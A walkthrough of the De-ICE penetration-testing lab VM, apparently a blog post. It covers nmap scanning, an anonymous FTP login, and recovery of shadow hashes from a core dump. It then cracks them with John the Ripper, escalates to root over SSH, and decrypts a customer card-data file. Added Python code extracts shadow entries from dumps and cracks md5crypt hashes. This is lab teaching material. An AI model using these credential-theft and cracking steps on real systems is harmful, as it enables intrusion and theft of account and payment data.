[De-ICE image]
Module:
root@bt5r1:~# nmap -n 192.168.1.1-255
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT
Nmap scan report for 192.168.1.2
Host is up (0.0000080s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
902/tcp open iss-realsecure
9876/tcp open sd
Nmap scan report for 192.168.1.110
Host is up (0.16s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
631/tcp open ipp
MAC Address: 00:0C:29:FB:68:A2 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00047s latency).
All 1000 scanned ports on 192.168.1.254 are filtered
MAC Address: 00:50:56:F4:F6:BF (VMware)
Nmap done: 255 IP addresses (3 hosts up) scanned in 10.42 seconds
From this we can tell that 192.168.1.2 is our own machine (the only host in the report without a MAC address, i.e. the local host) and that 192.168.1.254 is a VMware virtual interface with all 1000 scanned ports filtered, so 192.168.1.110 must be the De-ICE target. With the target's IP known, the next step is to learn more about the open ports and the services most likely running behind them.
Module:
root@bt5r1:~# nmap -n -sS -sV -O 192.168.1.110
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT
Nmap scan report for 192.168.1.110
Host is up (0.034s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh?
80/tcp open http Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2)
631/tcp open ipp CUPS 1.1
MAC Address: 00:0C:29:FB:68:A2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.34 seconds
From the scan results, the target has FTP (vsftpd 2.0.4), SSH (version not identified), HTTP (Apache httpd 2.2.4, i.e. a web server) and IPP (CUPS 1.1) open, and nmap fingerprints the OS as Linux 2.6. That is still not much to work with, so let's try logging in to FTP as the anonymous user to find out more.
Module:
root@bt5r1:~# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password: (leave it blank and press "Enter")
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
At this point we are logged in to FTP; next, we explore the directory structure the server exposes.
Module:
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 80 Mar 15 2007 .
drwxr-xr-x 4 0 0 80 Mar 15 2007 ..
drwxr-xr-x 7 1000 513 160 Mar 15 2007 download
drwxrwxrwx 2 0 0 60 Feb 26 2007 incoming
226 Directory send OK.
ftp> cd download
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 7 1000 513 160 Mar 15 2007 .
drwxr-xr-x 4 0 0 80 Mar 15 2007 ..
drwxr-xr-x 6 1000 513 340 Mar 15 2007 etc
drwxr-xr-x 4 1000 513 100 Mar 15 2007 opt
drwxr-xr-x 10 1000 513 400 Mar 15 2007 root
drwxr-xr-x 5 1000 513 120 Mar 15 2007 usr
drwxr-xr-x 3 1000 513 80 Mar 15 2007 var
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 6 1000 513 340 Mar 15 2007 .
drwxr-xr-x 7 1000 513 160 Mar 15 2007 ..
drwxr-xr-x 4 1000 513 160 Mar 15 2007 X11
-rw-r--r-- 1 1000 513 362436 Mar 03 2007 core
drwxr-xr-x 2 1000 513 100 Mar 15 2007 fonts
-rw-r--r-- 1 1000 513 780 Apr 30 2005 hosts
-rw-r--r-- 1 1000 513 718 Jul 03 2005 inputrc
-rw-r--r-- 1 1000 513 1296 Jun 10 2006 issue
[snip...]
226 Directory send OK.
Note the file named core: that is a core dump, the memory image written out when a process crashes, so it can contain anything the process had in memory at the time (file contents, environment variables, credentials). Download it for analysis, then quit the FTP client.
Module:
ftp> get core
local: core remote: core
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for core (362436 bytes).
226 File send OK.
362436 bytes received in 0.03 secs (13026.4 kB/s)
ftp> exit
221 Goodbye.
Let's have a look at this core file. Files downloaded with the ftp client are saved in the current working directory, which here is our home directory, /root/.
Module:
root@bt5r1:~# strings core
tdxt
CORE
CORE
test.pl
/usr/bin/perl ./test.pl -d
CORE
CORE
FLINUX
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
ocks
CPLUS_INCLUDE_PATH=/usr/lib/qt/include:/usr/lib/qt/include
MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/opt/kde/man:/usr/lib/qt/doc/man
KDE_MULTIHEAD=false
HZ=100
HOSTNAME=slax.slackware-live.cd
SHELL=/bin/bash
TERM=xterm
GTK2_RC_FILES=/etc/gtk-2.0/gtkrc:/root/.gtkrc-2.0:/root/.kde/share/config/gtkrc-2.0
GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc:/root/.kde/share/config/gtkrc
GS_LIB=/root/.fonts
WINDOWID=25165831
HUSHLOGIN=FALSE
QTDIR=/usr/lib/qt
LC_ALL=C
KDE_FULL_SESSION=true
USER=root
[snip...]
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
Wow! Look at the highlighted text (printed in bold red on the original page): those are the password hashes of the De-ICE users. The process that dumped core was running as root (USER=root, /usr/bin/perl ./test.pl -d) and had the contents of /etc/shadow in memory, so the whole shadow file ended up in the dump. The $1$ prefix marks them as md5crypt (FreeBSD MD5) hashes; entries with * instead of a hash are locked system accounts. So what next? We have to run a password-cracking attack, which can be done with John the Ripper. We need a dictionary (wordlist) to drive the cracking. You can get the dictionary here.
Module:
root@bt5r1:~# cd dictionaries/
root@bt5r1:~/dictionaries# cat common-1.txt common-2.txt common-3.txt common-4.txt wordlist.txt >> /root/passwords
root@bt5r1:~/dictionaries# cd ~
The commands above concatenate the dictionaries common-1.txt, common-2.txt, common-3.txt, common-4.txt and wordlist.txt into a single wordlist, /root/passwords (note that >> appends, so run it once or delete the file first).
OK, now that we have the wordlist, we need to build a shadow file from the hashes in the core dump we pulled earlier.
Module:
root@bt5r1:~# nano /root/shadow
Then paste in the core dump text shown in red above:
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
Drop the locked system accounts (the entries whose password field is *) and put each remaining entry on its own line, exactly as it would appear in /etc/shadow:
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
Now we have the shadow entries of four users: root, aadams, bbanter and ccoffee.
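The cut-and-paste above works for one dump, but it is easy to get wrong (one missing colon and John will refuse to load the line). Below is an added example, not part of the original De-ICE write-up, that does the same job in Python: scan a raw core file (or `strings` output) for anything shaped like a nine-field /etc/shadow entry, discard the locked accounts, and write the rest to a file John can load. The sample core bytes are constructed here from the entries shown above and stand in for the real 362436-byte file; the function names are my own.

```python
import re
import sys

# A Slackware-style /etc/shadow line has nine colon-separated fields:
# name:password:lastchg:min:max:warn:inactive:expire:flag. Fields 3-9 are
# numeric or empty, which is what separates a real entry from look-alikes
# such as PATH=/usr/bin:/bin that also contain colons.
SHADOW_RE = re.compile(
    rb"(?<![A-Za-z0-9_.-])"                          # do not start mid-word
    rb"([a-z_][a-z0-9_-]{0,31})"                     # 1: user name
    rb":([^:\x00-\x1f\x7f-\xff]*)"                   # 2: password field (hash, *, ! or empty)
    rb":(\d*):(\d*):(\d*):(\d*):(\d*):(\d*):(\d*)"   # 3-9: ageing fields
)

# Constructed sample: a few bytes of ELF header and environment, then the
# shadow entries shown above, then some binary junk.
SAMPLE_CORE = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"/usr/bin/perl ./test.pl -d\x00"
    + b"MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man\x00"
    + b"USER=root\x00"
    + b"root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::\n"
    + b"bin:*:9797:0:::::\n"
    + b"ftp:*:9797:0:::::\n"
    + b"nobody:*:9797:0:::::\n"
    + b"aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::\n"
    + b"bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::\n"
    + b"ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::\n"
    + b"\x00\xde\xad\xbe\xef"
)


def extract_shadow_entries(blob):
    """Return every shadow-format entry found anywhere in a binary blob.

    The pattern is not anchored to line breaks, so it works on a raw core,
    on `strings` output, and on entries run together on one line the way
    the dump was copy-pasted above.
    """
    return [b":".join(m.groups()).decode("ascii") for m in SHADOW_RE.finditer(blob)]


def crackable(entries):
    """Keep only accounts with a real hash; * and ! mean locked, empty means no password."""
    keep = []
    for entry in entries:
        pwfield = entry.split(":")[1]
        if pwfield and pwfield[0] not in "*!":
            keep.append(entry)
    return keep


def core_to_shadow(core_path, shadow_path):
    """Read a core dump and write a shadow file John can load; returns the entries."""
    with open(core_path, "rb") as f:
        entries = crackable(extract_shadow_entries(f.read()))
    with open(shadow_path, "w") as f:
        f.write("".join(e + "\n" for e in entries))
    return entries


if __name__ == "__main__":
    # usage: python3 core2shadow.py core /root/shadow   (no arguments: use the sample)
    if len(sys.argv) == 3:
        for e in core_to_shadow(sys.argv[1], sys.argv[2]):
            print(e)
    else:
        for e in crackable(extract_shadow_entries(SAMPLE_CORE)):
            print(e)
```

Run it on the real file as `python3 core2shadow.py core /root/shadow` and the output is the same four lines you assembled by hand, in the order they appear in the dump.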
Time to crack! We have both the shadow file and the wordlist in /root/. Now run this module:
root@bt5r1:~# cd /pentest/passwords/john/
root@bt5r1:/pentest/passwords/john# ./john --rules --wordlist=/root/passwords /root/shadow
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
Complexity (root)
Diatomaceous (ccoffee)
Zymurgy (bbanter)
guesses: 3 time: 0:00:04:40 4.37% (ETA: Thu Oct 27 16:07:48 2011) c/s: 6022 trying: Meteorologic
Session aborted
Explanation of the module above:
We run John the Ripper from /pentest/passwords/john/ with --rules (word-mangling rules applied to every dictionary word), the wordlist /root/passwords, and the target hashes in /root/shadow. John recognises the $1$ hashes as FreeBSD MD5 (md5crypt). After 4 minutes 40 seconds, 4.37% of the way through the run, three of the four passwords had been cracked and the session was aborted by hand; aadams was not recovered with this wordlist. The cracked passwords are:
Complexity (root)
Diatomaceous (ccoffee)
Zymurgy (bbanter)
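John labels these hashes "FreeBSD MD5": that is md5crypt, the $1$ scheme, and the reason it cracks at thousands of candidates per second is that it is only 1000 rounds of MD5 (modern Slackware uses sha512crypt or yescrypt instead). The following is an added example, my own code rather than John's or the original post's, that implements md5crypt with nothing but hashlib so you can verify a cracked password against its shadow entry, and then runs a small wordlist with a stand-in for John's --rules (as-is, lower, Capitalised, UPPER) against the four entries above. The wordlist is constructed; the function names are assumptions.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# The four entries reconstructed above.
SHADOW = [
    "root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::",
    "aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::",
    "bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::",
    "ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::",
]

# Constructed wordlist; two of the hits are present only in the wrong case,
# so the rule step is what finds them.
WORDLIST = ["password", "Meteorologic", "zymurgy", "Complexity", "diatomaceous"]


def _to64(value, count):
    """md5crypt's own base64 variant: 6 bits at a time, least significant first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """Poul-Henning Kamp's md5crypt ($1$), as used by glibc crypt(3) and Slackware.

    The salt is at most 8 characters; the 1000-round loop is the whole of the
    key stretching, which is why John gets thousands of c/s against it.
    """
    pw = password.encode()
    salt = salt.split("$")[0][:8].encode()
    magic = b"$1$"
    ctx = hashlib.md5(pw + magic + salt)
    alternate = hashlib.md5(pw + salt + pw).digest()
    n = len(pw)
    while n > 0:                        # as many bytes of alternate as pw is long
        ctx.update(alternate[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:                            # one byte per bit of len(pw): NUL or pw[0]
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):               # the stretching loop
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    encoded = ""
    for a, b, k in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[k], 4)
    encoded += _to64(final[11], 2)
    return (magic + salt).decode() + "$" + encoded


def verify(password, shadow_hash):
    """Constant-time comparison of a candidate password against a $1$ hash."""
    if not shadow_hash.startswith("$1$"):
        return False
    salt = shadow_hash.split("$")[2]
    return hmac.compare_digest(md5crypt(password, salt), shadow_hash)


def mangle(word):
    """Stand-in for John's --rules: the word as-is, lower, Capitalised, UPPER."""
    seen = []
    for cand in (word, word.lower(), word.capitalize(), word.upper()):
        if cand not in seen:
            seen.append(cand)
    return seen


def crack(shadow_lines, wordlist):
    """Return {user: password} for every $1$ entry some mangled word matches."""
    targets = {}
    for line in shadow_lines:
        user, pwfield = line.split(":")[:2]
        if pwfield.startswith("$1$"):
            targets[user] = pwfield
    found = {}
    for word in wordlist:
        for cand in mangle(word):
            for user, h in targets.items():
                if user not in found and verify(cand, h):
                    found[user] = cand
        if len(found) == len(targets):
            break
    return found


if __name__ == "__main__":
    for user, pw in crack(SHADOW, WORDLIST).items():
        print(f"{pw} ({user})")
```

Each verify() call costs 1000 MD5 operations, which is trivial for a single check and still cheap for a dictionary; compare that with sha512crypt's 5000 rounds of SHA-512 by default, or bcrypt and yescrypt, before treating a cracked md5crypt hash as evidence of a weak password rather than a weak hash.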
So, you've got the passwords? What then? That's up to you, but the following is the module I worked through after getting the passwords:
root@blue-dragon:~# ssh bbanter@192.168.1.110
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending key in /root/.ssh/known_hosts:2
RSA host key for 192.168.1.110 has changed and you have requested strict checking.
Host key verification failed.
root@blue-dragon:~# nano /root/.ssh/known_hosts
root@blue-dragon:~# ssh bbanter@192.168.1.110
The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.
RSA key fingerprint is 4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.
bbanter@192.168.1.110's password: [enter the cracked password]
Linux 2.6.16.
bbanter@slax:~$ ls -a
./ ../ .screenrc
bbanter@slax:~$ cd ..
bbanter@slax:/home$ ls -a
./ ../ aadams/ bbanter/ ccoffee/ ftp/ root/
bbanter@slax:/home$ cd root/
bbanter@slax:/home/root$ ls -a
./ ../ .save/ .screenrc
bbanter@slax:/home/root$ cd .save/
-bash: cd: .save/: Permission denied
bbanter@slax:/home/root$ su
Password: **********
root@slax:/home/root# pwd
/home/root
root@slax:/home/root# cd .save/
root@slax:/home/root/.save# ls -a
. .. copy.sh customer_account.csv.enc
root@slax:/home/root/.save# cat copy.sh
#!/bin/sh
#encrypt files in ftp/incoming
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
#remove old file
rm /home/ftp/incoming/$1
root@slax:/home/root/.save# openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
3838:error:0200B015:system library:fread:Is a directory:bss_file.c:198:
3838:error:20082002:BIO routines:FILE_READ:system lib:bss_file.c:199:
root@slax:/home/root/.save# openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
root@slax:/home/root/.save# ls -a
. .. .enc copy.sh customer_account.csv customer_account.csv.enc
root@slax:/home/root/.save# cat customer_account.csv
"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"
1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"
1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"
1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"
1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"
1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"
1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"
root@slax:/home/root/.save#
What I did was try to get into a directory with a high privilege level, /root/.save. Once inside, it turned out there was a file about customers; the way to get it is to run the copy.sh module with a slight syntax fix.
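The error at the first attempt comes from running the line out of copy.sh literally: $1 is the script's first argument, so with nothing to expand it openssl is handed /home/ftp/incoming/ itself and reports "fread: Is a directory", and the rm line after it would have been aimed at the directory path as well. Below is an added example, not the De-ICE copy.sh, of the same encrypt-and-remove step with the argument check the original lacks, plus the matching decrypt that the write-up runs by hand. It works in a temporary directory; INCOMING, SAVE and PWFILE are constructed stand-ins for /home/ftp/incoming, /home/root/.save and /etc/ssl/certs/pw, and the CSV line is constructed sample data.

```shell
#!/bin/sh
# Added example (not the De-ICE copy.sh): encrypt-and-remove with argument
# validation, plus the matching decrypt. Paths are constructed stand-ins for
# the ones on the target; remove "$WORK" yourself when done.
set -u

WORK=$(mktemp -d)
INCOMING="$WORK/incoming"      # stands in for /home/ftp/incoming
SAVE="$WORK/save"              # stands in for /home/root/.save
PWFILE="$WORK/pw"              # stands in for /etc/ssl/certs/pw
mkdir -p "$INCOMING" "$SAVE"
printf 'example-passphrase\n' > "$PWFILE"   # -pass file: reads the first line

# With "$1" empty, copy.sh hands openssl the directory itself ("Is a
# directory") and then aims rm at the directory path. Refuse empty names
# and anything with a path component, and insist the file exists.
check_name() {
    case "${1:-}" in
        "")            echo "usage: encrypt_incoming <file in $INCOMING>" >&2; return 2 ;;
        */* | . | ..)  echo "refusing path component in '$1'" >&2; return 2 ;;
    esac
    [ -f "$INCOMING/$1" ] || { echo "no such file: $INCOMING/$1" >&2; return 1; }
}

# Same cipher and -salt as copy.sh. -md md5 pins the key derivation to what
# OpenSSL 0.9.8 used, so the files match the ones found on the target.
# The plaintext is removed only if encryption succeeded.
encrypt_incoming() {
    check_name "$@" || return $?
    openssl enc -aes-256-cbc -salt -md md5 -in "$INCOMING/$1" \
        -out "$SAVE/$1.enc" -pass "file:$PWFILE" \
    && rm "$INCOMING/$1"
}

# The step the write-up does by hand with "openssl enc -d".
decrypt_saved() {
    [ -n "${1:-}" ] && [ -f "$SAVE/$1.enc" ] \
        || { echo "no such file: $SAVE/${1:-}.enc" >&2; return 1; }
    openssl enc -d -aes-256-cbc -md md5 -in "$SAVE/$1.enc" \
        -out "$SAVE/$1" -pass "file:$PWFILE"
}

# Round trip on a constructed one-line CSV; prints the recovered plaintext.
demo_roundtrip() {
    printf '%s\n' '1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"' \
        > "$INCOMING/customer_account.csv"
    encrypt_incoming customer_account.csv || return 1
    [ ! -e "$INCOMING/customer_account.csv" ] || return 1   # plaintext gone
    decrypt_saved customer_account.csv || return 1
    cat "$SAVE/customer_account.csv"
}

demo_roundtrip
```

If you copy customer_account.csv.enc off the box and decrypt it with a current OpenSSL, keep the -md md5: OpenSSL 0.9.8 derived the key and IV from the passphrase with MD5, while 1.1.0 and later default to SHA-256 and will report a bad decrypt even with the right password file. Recent releases also print a warning that this key derivation is deprecated; that is expected for files of this age.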
That's all from me, have fun (=
By: Blue Dragon